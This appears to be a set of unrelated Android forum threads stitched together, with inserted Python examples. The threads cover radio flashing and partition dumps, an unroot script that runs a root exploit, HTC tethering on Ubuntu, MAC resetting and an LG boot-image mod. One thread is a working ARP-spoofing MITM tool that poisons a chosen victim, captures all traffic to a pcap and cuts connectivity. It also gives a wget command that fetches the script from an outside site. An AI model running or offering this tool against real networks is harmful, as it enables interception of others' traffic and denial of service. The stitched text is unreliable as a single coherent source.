Flashing Global GSM radio in US GSM Moto G? - Moto G Q&A, Help & Troubleshooting

Hi, I bought the US GSM Moto G [XT1034] [AWS], and I was wondering: if I flashed the Global GSM radio (XT1032), would it brick my phone, or would I be able to use those 3G frequencies that are only available in the Global GSM version?

We don't know for sure yet.
I was looking into doing it the other way around, but I returned my 8GB XT1032 last Sunday with the intent of getting a 16GB XT1034 (the only two variants sold out here). I've still got the files and would be interested in looking at a dump of the XT1034 nonetheless. (In all likelihood I'll be getting the LTE Moto G announced earlier today instead.)
If you're interested in tinkering with this, keep reading. Here be dragons.
Boot the phone from recovery (even better if "fastboot boot" works with a completely stock device) and use ADB's port forwarding to make a full backup of your phone. The scripts below might help you out:
On the phone:
Code:
#!/bin/sh
# Reference: http://forum.xda-developers.com/showpost.php?p=29862574&postcount=1
# Serve each partition once, in order, on TCP port 5555; the computer-side
# script connects once per partition, in the same order, through "adb forward".
for i in $(busybox seq 1 36); do
    busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p$i
done
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0rpmb
On your computer:
Code:
#!/bin/bash
# Reference: http://forum.xda-developers.com/showpost.php?p=29862574&postcount=1
# Run "adb forward tcp:5555 tcp:5555" first so 127.0.0.1:5555 reaches the phone.
# Partition names by index (mmcblk0p1 .. mmcblk0p36) on the Moto G:
NAMES="modem sbl1 DDR aboot rpm tz sdi utags logs padA abootBackup rpmBackup
tzBackup sdiBackup utagsBackup padB modemst1 modemst2 hob dhob fsg fsc ssd sp
cid pds logo clogo persist misc boot recovery cache system kpan userdata"
i=1
for name in $NAMES; do
    nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p${i}_${name}.img
    read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n'
    i=$((i+1))
done
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0rpmb.img
In Windows, make NV item backups with QPST and EFS Professional. Edit: IIRC the phone won't talk to either program unless you reboot to the bootloader, press volume down to get to BP Tools and then press volume up to activate that option. The phone will then boot as usual, but enable additional "devices" over USB.
Regards,
Darkshado

The LTE Moto G wouldn't have this problem, right? It would work like the global GSM model, from what I have read.

Exactly, it's pentaband instead of tri-band HSPA.


Unroot for linux

Here's a modded Linux script, based on the defyroot script, to unroot your Defy:
Code:
#!/bin/bash
# execute as bash root_Defy.v2
# Following Bin4ry instructions
# Using http://c-skills.blogspot.com/2010/07/android-trickery.html exploit
# See http://intrepidusgroup.com/insight/2010/09/android-root-source-code-looking-at-the-c-skills/ for an explanation of the exploit
ADB="./adblinux"
if [ ! -e $ADB ] ; then
    echo "adb not found! Cannot continue." ;
    exit 1 ;
fi
chmod +x $ADB
# add the Motorola (22b8) udev rule once; the inner quotes must be escaped,
# otherwise the rule is written to the file without them
if [ $(grep -ic 22b8 /etc/udev/rules.d/51-android.rules) -eq 0 ] ; then
    echo "SUBSYSTEM==\"usb\", ATTRS{idVendor}==\"22b8\", MODE=\"0666\"" >> /etc/udev/rules.d/51-android.rules ;
fi
if [ $($ADB devices | grep -c device$) -ne 1 ] ; then
    echo "Too many devices attached: exiting!" ;
    exit 1;
fi
SERIALNO=$($ADB devices | grep device$ | cut -f1)
if [ $? -eq 0 ] ; then
    echo "Found device $SERIALNO" ;
else
    echo "Error searching device number!" ;
    exit 1;
fi
for file in rageagainstthecage su Superuser.apk ; do
    echo -n "Pushing $file: " ;
    $ADB -s $SERIALNO push $file /data/local/tmp/$file ;
    echo "done" ;
done
#$ADB -s $SERIALNO push rageagainstthecage /data/local/tmp/rageagainstthecage
#$ADB -s $SERIALNO push su /data/local/tmp/su
#$ADB -s $SERIALNO push Superuser.apk /data/local/tmp/Superuser.apk
echo -n "Making rageagainstthecage executable and executing it: "
$ADB -s $SERIALNO shell chmod 755 /data/local/tmp/rageagainstthecage
$ADB -s $SERIALNO shell /data/local/tmp/rageagainstthecage
echo "done"
echo "Waiting 15 sec for phone adbd to restart before continuing"
sleep 15
echo -n "Remounting filesystem in read-write mode: "
$ADB -s $SERIALNO shell mount -o remount,rw -t ext3 /dev/block/mmcblk1p21 /system
echo "done"
echo -n "Removing su command: "
$ADB -s $SERIALNO shell rm /system/bin/su
echo "done"
echo -n "Removing Superuser apk: "
$ADB -s $SERIALNO shell rm /system/app/Superuser.apk
echo "done"
exit 0
added to linux tools, thanks!
By editing the original I could ensure that only what was created by the original was altered, although in theory you should be able to strip or add any files you want in the same way.
Works for sure on Fedora 15 and openSUSE 11.4, and on anything the original script works on.

[Q] Internet passthrough on Ubuntu

Hi guys,
I want to use my PC running Ubuntu 12.04 64-bit to access the internet.
Usually in Windows I use the HTC tool.
My phone is not rooted.
Thanks for the help.
??
39 views, 0 replies!!!!
Because maybe the ones who viewed the thread didn't know a solution, hence didn't answer.
Maybe someone who uses Ubuntu would know...
Most of us use Windows...
Sent from a Desire S waiting for Kernel 3. WAKE UP HTC!!!!
If you have HTC Sense on your device, just tick the INTERNET PASS THROUGH option from the notification tab
and the system will do the rest.
Cheers.
Check out the screenshot below.
Thanks for your replies.
lynxnoon: yes, I've tried to do that; it gets connected to the PC but without an internet connection.
Ensure the adapters (especially the wired one) are updated online and then try again.
Also ensure there is a pass-through connection on your phone and then try to browse with the built-in browser.
If all this still doesn't work then you have to find out whether the internet service provider allows tethering, or which modem you are using.
Cheers.
Rabih-Sy said:
Hi guys,
I want to use my PC running Ubuntu 12.04 64-bit to access the internet.
Usually in Windows I use the HTC tool.
My phone is not rooted.
Thanks for the help.
When I connect my phone and choose Internet Pass Through, the phone chooses an IP address in 192.168.99.0/24. If yours creates a different subnet you will have to change the lines below accordingly.
I hope this solves your problem.
Edit /etc/rc.local (sudo nano /etc/rc.local) and add the following:
Code:
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null
iptables -P FORWARD ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE -s 192.168.99.0/24
iptables -A FORWARD -i eth0 -o usb0 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i usb0 -o eth0 -j ACCEPT
# forward all DNS queries from usb0 to Google's DNS server
iptables -t nat -I PREROUTING -i usb0 -p udp --dport 53 -j DNAT --to 8.8.8.8
Then at a terminal type:
Code:
sudo /etc/rc.local
That will get you connectivity, but it will be short lived, because HTC is stupid and will disconnect if it doesn't detect the winblows HTC software crap.
So you will need to fake it out. Turns out the phone is listening for the HTC software on port 6000, waiting for the hex bytes 00 02 00 00.
First you have to find the IP address of your phone (if arp doesn't work or you get "command not found", you probably need sudo arp):
Code:
phoneip=$(arp -n | grep usb0 | awk 'BEGIN {FS=" "} {print $1}')
Then you tell the phone that the HTC software is listening:
Code:
echo -n -e "\x00\x02\x00\x00" | nc $phoneip 6000 > /dev/null
To make that automagic each time, use a script. Call it htcfaker or whatever:
Code:
#!/bin/bash
while :; do
    # wait until the phone shows up in the ARP table on usb0
    phoneip=$(arp -n | grep usb0 | awk 'BEGIN {FS=" "} {print $1}')
    while [ -z "$phoneip" ]; do
        sleep 15
        phoneip=$(arp -n | grep usb0 | awk 'BEGIN {FS=" "} {print $1}')
    done
    # pretend to be the HTC software so the phone keeps the pass-through up
    echo -n -e "\x00\x02\x00\x00" | nc $phoneip 6000 > /dev/null
    # then wait until the phone disappears again (unplugged) before looping
    while [ "$phoneip" != "" ]; do
        sleep 15
        phoneip=$(arp -n | grep usb0 | awk 'BEGIN {FS=" "} {print $1}')
    done
done
Then in your startup applications, point to that script.
Hope it helps!
I'm using an unrooted HTC Sensation XE and Ubuntu 12.04 64-bit; with these scripts Internet Pass Through works beautifully!
Did anyone experience the problem that this stopped working after a day or so?
When I plug in the phone now it just won't give an IPv4 address, therefore there's nothing to re-route through the PC?
Mine is still working without any problem after 2 months. I can only suggest you check 2 things:
Ensure your /etc/rc.local file has not been changed by any Ubuntu update.
You have to run the "htcfaker" script in a Terminal before plugging in your phone. Do not close this Terminal until you want to disconnect.
fruity12 said:
Did anyone experience the problem that this stopped working after a day or so?
When I plug in the phone now it just won't give an IPv4 address, therefore there's nothing to re-route through the PC?
iptables table 'nat' not found while running sudo /etc/rc.local script
ykkhern said:
Mine is still working without any problem after 2 months. I can only suggest you check 2 things:
Ensure your /etc/rc.local file has not been changed by any Ubuntu update.
You have to run the "htcfaker" script in a Terminal before plugging in your phone. Do not close this Terminal until you want to disconnect.
I have updated the /etc/rc.local file but I'm getting the error below. What needs to be done? I'm a newbie to Linux; nevertheless I tried to look into many forums but couldn't get it resolved. Please help!!
Code:
[email protected]:~$ sudo /etc/rc.local
[sudo] password for anvyal:
iptables v1.4.18: can't initialize iptables table `nat': Table does not exist (do you need to insmod?)
Perhaps iptables or your kernel needs to be upgraded.
Please let me know if any other info needs to be provided. Thanks in advance for your help !!
anvyal said:
I have updated the /etc/rc.local file but I'm getting the error below. What needs to be done? I'm a newbie to Linux; nevertheless I tried to look into many forums but couldn't get it resolved. Please help!!
Code:
[email protected]:~$ sudo /etc/rc.local
[sudo] password for anvyal:
iptables v1.4.18: can't initialize iptables table `nat': Table does not exist (do you need to insmod?)
Perhaps iptables or your kernel needs to be upgraded.
Please let me know if any other info needs to be provided. Thanks in advance for your help!!
Please check the following line in your /etc/rc.local:
Code:
iptables -A POSTROUTING -t nat -j MASQUERADE -s 192.168.99.0/24
You have to change the IP subnet (192.168.99.0/24 in the line above) to match your phone's IP address. If your phone uses 192.168.1.2, for example, then you'll have to change the IP subnet to 192.168.1.0/24.
To find your phone's IP address, first connect your phone to your PC in USB tethering mode. Then on the PC side open a Terminal and issue the command "arp" (without the quotes), which shall give you the IP address of your phone.
Good luck!
Script update required for recent phones?
This script didn't work for me on my M8: the sync hex data seems to have grown, and just passing the \x00\x02\x00\x00 string caused the pass-through to immediately disconnect with the failure message "Either you do not have the latest version of HTC Sync Manager installed, or another phone is already using Internet pass-through on your PC".
Changing this line in the script:
Code:
echo -n -e "\x00\x02\x00\x00" | nc $phoneip 6000 > /dev/null
to this fixes it:
Code:
echo -n -e "\x00\x02\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00" | nc $phoneip 6000 > /dev/null
I got this from vc0528.tumblr.com/post/71168788542/simulate-htc-sync-manager-via-usb-on-linux-os, which also has an alternative Perl script, which works a treat too:
Code:
#!/usr/bin/perl
use IO::Socket::INET;
# 6000/tcp open X11
# wait until a usb0 neighbour with a complete (flags 0x2) ARP entry shows up
do {
    open IN, "/proc/net/arp"; @arp = <IN>; close IN;
    @d = grep ! /00:00:00:00:00:00/, grep /0x2.*usb0/, @arp;
} until ($d[0]);
$_ = $d[0]; s/\ .*//; chomp; print "sock:\t$_\n";
my $sock = IO::Socket::INET->new(PeerAddr => $_, PeerPort => 6000, Type => SOCK_STREAM, Proto => "tcp") or die "Can not create socket $@\n";
print $sock "\x00\x02\x00\x00";
print $sock "\x00\x03\x00\x00";
print $sock "\x00\x05\x00\x00";
close $sock;
Finally, if it helps anyone, I wanted to set up a WiFi range extender, so my iptables forward rules were:
Code:
-A FORWARD -i wlan1 -o usb0 -m state --state RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -i usb0 -o wlan1 -j ACCEPT
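As an added example (not code from any of the posts above), here is the same pass-through logic in Python: it picks the phone's address out of /proc/net/arp the way the Perl script does, skipping unresolved entries, builds both the old 4-byte and the newer 12-byte HTC Sync sequences, and derives the MASQUERADE rule for whatever subnet the phone chose. The /proc/net/arp contents are constructed sample data; the live polling and the socket send only run from the __main__ block.

```python
import ipaddress
import socket
import time

# HTC Sync handshake bytes from the thread: the 4-byte word for older phones,
# all three words together for newer ones such as the M8.
HANDSHAKE_OLD = b"\x00\x02\x00\x00"
HANDSHAKE_NEW = HANDSHAKE_OLD + b"\x00\x03\x00\x00" + b"\x00\x05\x00\x00"
HTC_SYNC_PORT = 6000

# Constructed /proc/net/arp contents. Columns: IP address, HW type, Flags,
# HW address, Mask, Device. Flags 0x2 = complete entry, 0x0 = unresolved.
SAMPLE_ARP = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         52:54:00:12:34:56     *        eth0
192.168.99.2     0x1         0x0         00:00:00:00:00:00     *        usb0
192.168.99.1     0x1         0x2         02:11:22:33:44:55     *        usb0
"""


def phone_ip_from_arp(arp_text, iface="usb0"):
    """Return the IPv4 address of the first complete ARP entry on iface, or
    None. Unresolved entries (flags 0x0, all-zero MAC) are skipped; that is
    what the 'no IPv4 address' situation described in the thread looks like."""
    for line in arp_text.splitlines()[1:]:
        fields = line.split()
        if len(fields) != 6:
            continue
        ip, _hwtype, flags, mac, _mask, dev = fields
        if dev != iface:
            continue
        if int(flags, 16) & 0x2 and mac != "00:00:00:00:00:00":
            return ip
    return None


def masquerade_rule(phone_ip, prefix=24):
    """Build the POSTROUTING rule for the subnet the phone picked, which is
    the line people in the thread had to adjust by hand."""
    net = ipaddress.ip_network(f"{phone_ip}/{prefix}", strict=False)
    return f"iptables -A POSTROUTING -t nat -j MASQUERADE -s {net}"


def wait_for_phone(iface="usb0", path="/proc/net/arp", poll=15):
    """Poll the live ARP table until the phone has a complete entry."""
    while True:
        with open(path) as f:
            ip = phone_ip_from_arp(f.read(), iface)
        if ip:
            return ip
        time.sleep(poll)


def tell_phone_sync_is_running(phone_ip, payload=HANDSHAKE_NEW, timeout=5):
    """Send the bytes the phone waits for on port 6000; returns bytes sent."""
    with socket.create_connection((phone_ip, HTC_SYNC_PORT), timeout=timeout) as s:
        s.sendall(payload)
    return len(payload)


if __name__ == "__main__":
    ip = wait_for_phone()
    print("phone at", ip, "->", masquerade_rule(ip))
    tell_phone_sync_is_running(ip)
```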

[HOWTO] MITM ARPspoofing automatic script ARM/BASH

Hello everybody,
Sorry in advance for my English, I'm French.
My main phone is broken, so I have an old Galaxy Mini (Android Gingerbread) as a replacement... and I want to use it for some MiTM spoofing and information gathering, but the Play Store apps are not compatible or are buggy for me.
The script works for me, but the method used to get the local IP / gateway IP may differ by phone or Android version.
I post the script here; maybe it will give someone an idea.
So I used the nmap ARM binaries from the nmap website (nmap/nping) to create a little script (182 lines) to automate MiTM; it's very lightweight and easy to use.
Requirements:
rooted phone
busybox
tcpdump
bash
Features:
MiTM ARP spoofing (restores the original gateway MAC after the attack)
MiTM ARP spoofing with tcpdump logging data to a pcap file (restores the original gateway MAC after the attack)
Netcut: replaces the gateway MAC with another fake MAC address
Installation of the binaries
Code:
mkdir -p /sdcard/opt
cd /sdcard/opt
# get the binaries from the nmap website
wget "http://ftp.linux.hr/android/nmap/nmap-6.46-android-arm-bin.tar.bz2"
tar xvjf nmap-6.46-android-arm-bin.tar.bz2
# install to /system/xbin
cd nmap-6.46
mount -o remount,rw /system
cp -v bin/nmap /system/xbin
cp -v bin/nping /system/xbin
# put /system back to read-only
mount -o remount,ro /system
Tool: mitm.bash
Copy the script below to /sdcard/mitm.bash,
then run bash /sdcard/mitm.bash and enjoy it,
or download it from the web with:
Code:
wget -q http://www.web-point-zero.fr/mitm.bash -O /sdcard/mitm.bash && (echo "All good run : bash /sdcard/mitm.bash" ) || (echo "Error to download file ")
Code:
#!/bin/bash
echo "*** Tools create by c0derz67 from forum.xda-developers.com ****";
echo -e "\n\n";
TMP_DIRECTORY="/sdcard/_nettools_$RANDOM"; # maybe change by our sdcard directory
MAIN_INTERFACE="wlan0" # change with your interface name
mkdir -p "$TMP_DIRECTORY" || (echo "Can't create $TMP_DIRECTORY";exit;);
cd $TMP_DIRECTORY || (echo "Can't chdir to $TMP_DIRECTORY";exit;);
trap "echo \"Bye bye :) remove $TMP_DIRECTORY\";rm -r $TMP_DIRECTORY;exit;" 0 1 2 3 15;
echo "[*] GET GATEWAY "
GATEWAY=$(ip route show | grep $MAIN_INTERFACE | grep -o -E "via.*dev" | cut -d ' ' -f2);
if [ $? -eq 0 ]; then
echo " -> GATEWAY IS $GATEWAY"
else
echo ERROR TO GET GATEWAY
exit;
fi
echo "[*] GET ADDRESS "
MY_ADDRESS=$(ip route show | egrep -o "src .*"|cut -d ' ' -f2);
if [ $? -eq 0 ]; then
echo " -> MY_ADDRESS IS $MY_ADDRESS"
else
echo ERROR TO GET ADDRESS
exit;
fi
echo "[*] Get Mac address : ";
MY_MAC=$(busybox ifconfig $MAIN_INTERFACE | grep -E -o "HWaddr .*"|cut -d ' ' -f2);
if [ -n "$MY_MAC" ]; then
echo " -> Mac address is : $MY_MAC"
else
echo "UNABLE TO GET MAC ADDR"
exit;
fi;
GATEWAY_FIRST_PART_IP_1=$(echo $GATEWAY | cut -d '.' -f1);
GATEWAY_FIRST_PART_IP_2=$(echo $GATEWAY | cut -d '.' -f2);
GATEWAY_FIRST_PART_IP_3=$(echo $GATEWAY | cut -d '.' -f3);
GATEWAY_FIRST_PART_IP_4=$(echo $GATEWAY | cut -d '.' -f4);
MY_ADDRESS_FIRST_PART_IP_1=$(echo $MY_ADDRESS | cut -d '.' -f1);
MY_ADDRESS_FIRST_PART_IP_2=$(echo $MY_ADDRESS | cut -d '.' -f2);
MY_ADDRESS_FIRST_PART_IP_3=$(echo $MY_ADDRESS | cut -d '.' -f3);
MY_ADDRESS_FIRST_PART_IP_4=$(echo $MY_ADDRESS | cut -d '.' -f4);
SCAN_IP_RANGE="$MY_ADDRESS_FIRST_PART_IP_1.$MY_ADDRESS_FIRST_PART_IP_2.$MY_ADDRESS_FIRST_PART_IP_3.1-255";
echo "[*] Scan : $SCAN_IP_RANGE "
nmap -n -v -sP "$SCAN_IP_RANGE" | grep -v down
echo -e "\n\n"
echo "[*] DEVICE(S) connected to network : ";
echo -e "\n";
mkdir ip || (echo "Can't create IP";exit);
GATEWAY_MAC="";
counter=0;
arp -n -a | grep -v incomplete > ARP_RESULT.txt
already_set=0;
while((1));
do
i=0;
while read line;do
i=$(($i+1));
THIS_IP=$(echo $line | egrep -o "[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+" );
THIS_MAC=$(echo $line | egrep -o ".{2}:.{2}:.{2}:.{2}:.{2}:.{2}" )
if [ "$THIS_IP" = "$GATEWAY" ];then
GATEWAY_MAC=$THIS_MAC;
fi;
#echo "[$i] CURRENT MAC : $THIS_MAC ";
#echo "[$i] CURRENT IP : $THIS_IP"
echo "$i ) $THIS_IP ( $THIS_MAC ) "
if [ "$already_set" -eq 0 ]; then
mkdir $i;
echo $THIS_MAC > $i/MAC
echo $THIS_IP > $i/IP
fi;
done < ARP_RESULT.txt;
already_set=1;
echo -e "\n"
read -n 1 -p "[*] Select target ( 1-$i ) : " number_victim;
echo "";
if [ ! -d $number_victim ];then
echo "$number_victim is not a good target";
continue;
fi
TARGET_MAC=$(cat $number_victim/MAC );
TARGET_IP=$(cat $number_victim/IP );
echo -e "\n\n"
echo "[*] Select attack : ";
echo -e "\n"
echo "1) Arp Spoofing MITM (Catch and Redirect trafic to gateway) ";
echo "2) MITM and dump all trafic to /sdcard/dump.pcap (required tcpdump)";
echo "3) Netcut Arp Spoofing replace gateway mac to invalid mac ";
echo -e "\n"
read -n 1 -p "[*] Attack type : " number_attack;
case $number_attack in
1)
clear
echo "[*] Start 1) Arp Spoofing MITM (Catch and Redirect trafic to gateway)";
echo "[?] Press any key to stop "
sleep 3s;
echo "[*] Set net.ipv4.ip_forward -> 1";
sysctl -w net.ipv4.ip_forward=1
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac $MY_MAC --dest-mac $TARGET_MAC $TARGET_IP -c 99999 &
read -n 1
GET_PID=$!
echo -e "\n\n";
echo "********* STOP ATTACK *********";
kill -9 $GET_PID;
echo "[*] Restore gateway original mac";
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac $GATEWAY_MAC --dest-mac $TARGET_MAC $TARGET_IP -c 10
read -p "Wait to continue"
;;
2)
clear
echo "[*] Start 2) MITM and dump all trafic to /sdcard/dump.pcap (required tcpdump)";
echo "[?] Press any key to stop "
sleep 3s;
echo "[*] Set net.ipv4.ip_forward -> 1";
sysctl -w net.ipv4.ip_forward=1
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac $MY_MAC --dest-mac $TARGET_MAC $TARGET_IP -c 99999 >log_nping.txt &
PID_nping=$!
sleep 5s;
echo "Let's see what nping say log_nping.txt : "
echo -e "\n\n";
cat log_nping.txt
echo -e "\n\n";
echo "[*] Arp spoofing (nping) running in background see $TMP_DIRECTORY/log_nping.txt for detail"
echo "[*] Running tcpdump exclude $MY_ADDRESS packet";
tcpdump -i $MAIN_INTERFACE -s0 -v -w /sdcard/dump.pcap &
PID_tcpdump=$!
read -n 1
echo "********* STOP ATTACK *********";
echo "[*] kill tcpdump"
kill $PID_tcpdump;
echo "[*] kill nping"
kill $PID_nping
echo "[*] Restore gateway original mac";
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac $GATEWAY_MAC --dest-mac $TARGET_MAC $TARGET_IP -c 10
read -p "Wait to continue"
;;
3)
clear
echo "[*] Start 3) Netcut Arp Spoofing replace gateway mac to invalid mac";
echo "[?] Press any key to stop "
sleep 3s;
echo "[*] Set net.ipv4.ip_forward -> 1";
sysctl -w net.ipv4.ip_forward=1
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac cc:cc:cc:cc:cc:cc --dest-mac $TARGET_MAC $TARGET_IP -c 99999 &
PID_nping=$!
read -n 1
echo "********* STOP ATTACK *********";
echo "[*] kill nping"
kill $PID_nping
echo "[*] Restore gateway original mac";
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac $GATEWAY_MAC --dest-mac $TARGET_MAC $TARGET_IP -c 10
read -p "Wait to continue"
;;
esac
done;
done;
#ARP POISOING help
#nping --arp --arp-type ARP-reply --arp-sender-ip (GATEWAY IP) --arp-sender-mac (ATTACKER IP ) --dest-mac (MAC VICTIME) (IP VICTIM) -c 999999
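The defensive counterpart, added here as an example that is not part of the post: a small detector that looks at ARP replies (for instance captured on the host being protected, or on a mirror port) and flags the two bindings the script above produces, the gateway IP advertised with another host's MAC and the gateway IP advertised with the bogus cc:cc:cc:cc:cc:cc MAC, then notes when the genuine MAC is advertised again. The trusted gateway binding and the reply records are constructed sample data.

```python
# Trusted gateway binding, normally recorded at a known-good moment (constructed).
GATEWAY_IP = "192.168.1.1"
TRUSTED = {GATEWAY_IP: "aa:bb:cc:00:00:01"}

# Constructed ARP replies as (sender_ip, sender_mac, target_mac): what a sniffer
# on the victim (MAC ...10) would see while the script's options 1 and 3 run.
SAMPLE_REPLIES = [
    (GATEWAY_IP, "aa:bb:cc:00:00:01", "aa:bb:cc:00:00:10"),      # genuine gateway
    ("192.168.1.20", "aa:bb:cc:00:00:20", "aa:bb:cc:00:00:10"),  # host .20, normal reply
    (GATEWAY_IP, "aa:bb:cc:00:00:20", "aa:bb:cc:00:00:10"),      # gateway IP with .20's MAC
    (GATEWAY_IP, "aa:bb:cc:00:00:20", "aa:bb:cc:00:00:10"),      # repeated (nping -c 99999)
    (GATEWAY_IP, "cc:cc:cc:cc:cc:cc", "aa:bb:cc:00:00:10"),      # gateway IP with a bogus MAC
    (GATEWAY_IP, "aa:bb:cc:00:00:01", "aa:bb:cc:00:00:10"),      # original MAC advertised again
]


def detect_arp_spoofing(replies, trusted):
    """Return alerts (dicts) in first-seen order, one per distinct anomaly,
    with a count of how many replies carried it. A mac -> ips table of the
    non-gateway hosts lets it tell 'MAC belongs to another host' (mitm) from
    'MAC never seen on this LAN' (bogus); 'restored' marks the end of a run."""
    ips_for_mac = {}        # mac -> set of IPs it has answered for
    alerts, index = [], {}  # alerts and a dedup index keyed by (kind, ip, mac)
    spoofed = set()         # trusted IPs currently advertised with a wrong MAC
    for ip, mac, target in replies:
        good_mac = trusted.get(ip)
        if good_mac is None:
            ips_for_mac.setdefault(mac, set()).add(ip)
            continue
        if mac == good_mac:
            if ip in spoofed:
                alerts.append({"kind": "restored", "ip": ip, "mac": mac,
                               "target": target, "impersonator": [], "count": 1})
                spoofed.discard(ip)
            continue
        others = sorted(ips_for_mac.get(mac, set()) - {ip})
        kind = "mitm" if others else "bogus"
        key = (kind, ip, mac)
        if key not in index:
            index[key] = len(alerts)
            alerts.append({"kind": kind, "ip": ip, "mac": mac, "target": target,
                           "impersonator": others, "count": 0})
        alerts[index[key]]["count"] += 1
        spoofed.add(ip)
    return alerts


def format_alert(a):
    who = f" (MAC also used by {', '.join(a['impersonator'])})" if a["impersonator"] else ""
    return f"[{a['kind']}] {a['ip']} advertised as {a['mac']} to {a['target']} x{a['count']}{who}"


if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_REPLIES, TRUSTED):
        print(format_alert(alert))
```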

reset mac address (tested on lineage os)

original: https://cafe.naver.com/dr1phone/70671
Some of them have a MAC address like 82:82:FF:bla:bla.
This may cause some problems using WiFi,
but this is not the ROM's problem;
it is the default value of your phone
(why did they make it like this?).
You can fix it simply using this script (attached).
Run it as root using bash in the TWRP shell or a terminal emulator.
Code:
echo "* created by djdisodo! *"
echo "generating mac address"
# six random bytes as 12 hex digits
MAC=$(dd if=/dev/urandom bs=1024 count=1 2>/dev/null | md5sum | cut -c1-12)
# make it a locally-administered unicast address: clear bit 0 (multicast) and
# set bit 1 (local) of the first byte; a random first byte with bit 0 set
# would be a multicast address, which is not a valid station address
FIRST=$(( (0x${MAC:0:2} & 0xfe) | 0x02 ))
MAC=$(printf '%02x%s' "$FIRST" "${MAC:2}")
echo "remounting /persist"
umount /persist
mount -t ext4 /dev/block/bootdevice/by-name/persist /persist
echo "new mac address: $MAC"
echo "removing old mac address"
rm -f /persist/wlan_mac.bin
echo "writing new mac address"
# the six raw bytes, then 18 NUL bytes of padding (bash's builtin echo prints
# '\0' literally, so printf is used for both)
printf "$(echo "$MAC" | sed 's/../\\x&/g')" > /persist/wlan_mac.bin
for i in $(seq 0 17)
do
    printf '\0' >> /persist/wlan_mac.bin
done
echo "changing permissions"
chmod 644 /persist/wlan_mac.bin
echo "unmounting partition"
umount /persist
echo "done!"
exit 0
I wanted to make it into a flashable zip,
but I couldn't.
Will someone do it?

How to Unpack Boot Image and remove LG RCT and Triton Lgv20 (Linux & root only)

STANDARD DISCLAIMER: I am not responsible for any damage caused to your phone. Use this guide at your own risk; there is no warranty or guarantee.
I only know how to do this in Linux, in the terminal. This has only been done on stock Oreo 8.0; it may not work on Nougat, never tested. This mod will speed up your phone. We are going to remove a very small program, "rctd", that's buried in the phone's boot image file. Also there is an antivirus scanner buried in the boot image; it slows the phone down by scanning every file.
This guide is my notes on what I did to remove LG RCT from my H910 LG V20. But you can use this guide to remove LG RCT from your LG V20.
Guide updated on 6-28-22
Requirements:
Root/Twrp
Lgv20
Stock Oreo 8.0
Linux
You can just copy and paste the commands into the Linux terminal.
Install abootimg. In the Linux terminal paste:
Ubuntu: sudo apt-get install abootimg
Arch: yay -S abootimg
Install fastboot and adb:
Ubuntu: sudo apt-get install android-tools-adb android-tools-fastboot
Arch: sudo pacman -S android-tools
Reboot the phone into TWRP. Connect the phone via USB cable. In the Linux terminal paste:
sudo su
mkdir /tmp/test
cd /tmp/test
Get your boot.img:
adb shell dd if=/dev/block/bootdevice/by-name/boot of=/tmp/boot.img
adb pull /tmp/boot.img /tmp/test
sync
ls
The boot.img should now be on your computer in /tmp/test/.
You can unplug the USB cable from the phone, but stay in TWRP; we will need that later.
abootimg -x /tmp/test/boot.img
mkdir /tmp/test/initrd
cd /tmp/test/initrd
cat ../initrd.img | gunzip | cpio -vid
Now we are going to remove rctd and lge_fota updates, comment out LG RCT access, comment out lge_handle_panic, and comment out the Triton service. You should be able to just copy all and paste all at once. Also, I found a speed tweak: changing dalvik.vm.dex2oat-Xmx=512m to dalvik.vm.dex2oat-Xmx=256m will increase the speed of the phone.
rm /tmp/test/initrd/sbin/bnrd
rm /tmp/test/initrd/sbin/rctd
rm /tmp/test/initrd/sbin/lge_fota
sed -i '605 s/^/#/' /tmp/test/initrd/nonplat_file_contexts
sed -i '964 s/^/#/' /tmp/test/initrd/nonplat_file_contexts
sed -i '20 s/^/#/' /tmp/test/initrd/nonplat_file_contexts
sed -i '790 s/^/#/' /tmp/test/initrd/nonplat_file_contexts
sed -i '1029 s/^/#/' /tmp/test/initrd/nonplat_file_contexts
sed -i '1057,1058 s/^/#/' /tmp/test/initrd/nonplat_file_contexts
sed -i '1067 s/^/#/' /tmp/test/initrd/nonplat_file_contexts
sed -i '10 s/^/#/' /tmp/test/initrd/nonplat_seapp_contexts
sed -i '485 s/^/#/' /tmp/test/initrd/nonplat_property_contexts
sed -i '1343 s/^/#/' /tmp/test/initrd/nonplat_file_contexts
sed -i '129 s/^/#/' /tmp/test/initrd/init.msm8996_core.rc
sed -i '133 s/^/#/' /tmp/test/initrd/init.msm8996_core.rc
sed -i '137 s/^/#/' /tmp/test/initrd/init.msm8996_core.rc
sed -i '141 s/^/#/' /tmp/test/initrd/init.msm8996_core.rc
sed -i '145 s/^/#/' /tmp/test/initrd/init.msm8996_core.rc
sed -i '7,13 s/^/#/' /tmp/test/initrd/init.elsa.power.rc
sed -i '17 s/^/#/' /tmp/test/initrd/init.elsa.power.rc
sed -i '19,29 s/^/#/' /tmp/test/initrd/init.elsa.power.rc
sed -i '32,33 s/^/#/' /tmp/test/initrd/init.elsa.power.rc
sed -i '83,105 s/^/#/' /tmp/test/initrd/init.elsa.power.rc
sed -i '232,233 s/^/#/' /tmp/test/initrd/init.elsa_core.rc
You can check to make sure it worked with these commands:
clear
ls /tmp/test/initrd/sbin/bnrd
ls /tmp/test/initrd/sbin/rctd
ls /tmp/test/initrd/sbin/lge_fota
sed -n 605p /tmp/test/initrd/nonplat_file_contexts
sed -n 964p /tmp/test/initrd/nonplat_file_contexts
sed -n 20p /tmp/test/initrd/nonplat_file_contexts
